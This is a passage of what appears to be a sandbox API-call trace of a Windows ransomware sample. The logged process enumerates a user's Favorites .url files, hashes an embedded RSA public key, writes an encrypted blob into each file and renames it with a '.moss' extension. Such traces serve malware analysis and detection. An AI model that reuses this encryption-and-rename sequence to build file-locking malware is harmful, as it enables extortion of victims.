"c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.moss")) returned 1 [0171.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.505] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3280 | out: hHeap=0xcd0000) returned 1 [0171.506] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0171.507] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned=".url" [0171.507] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.507] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=133) returned 1 [0171.507] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.510] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.510] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.511] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x85, lpOverlapped=0x0) returned 1 [0171.511] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.511] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.512] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.512] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.512] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.512] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.512] GetLastError () returned 0x0 [0171.512] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.512] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.513] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.513] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.513] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.513] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.513] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.513] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.513] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.moss")) returned 1 [0171.514] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.514] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.514] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.515] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3280 | out: hHeap=0xcd0000) returned 1 [0171.515] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0171.515] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned=".url" [0171.515] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.516] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=133) returned 1 [0171.516] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.519] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.519] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.520] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x85, lpOverlapped=0x0) returned 1 [0171.520] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.520] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.521] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.521] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.521] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.521] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.521] GetLastError () returned 0x0 [0171.521] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.521] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.521] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.521] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.521] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.521] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.521] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.521] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.522] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.522] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.522] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.522] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.moss")) returned 1 [0171.524] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.524] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.524] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.526] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3280 | out: hHeap=0xcd0000) returned 1 [0171.526] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0171.526] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0171.526] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0171.526] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2840 | out: hHeap=0xcd0000) returned 1 [0171.526] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0171.526] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0171.526] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0171.526] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.527] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.527] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.527] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.527] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.527] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.527] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.527] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.527] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.527] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.527] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.527] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.527] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.527] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.527] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.527] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.527] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.527] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.527] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.527] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.527] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.527] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.527] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.527] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.527] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.528] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.528] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0171.528] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.528] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.528] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.528] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.528] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.529] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.529] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.529] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.529] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.530] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.532] HeapFree (in: 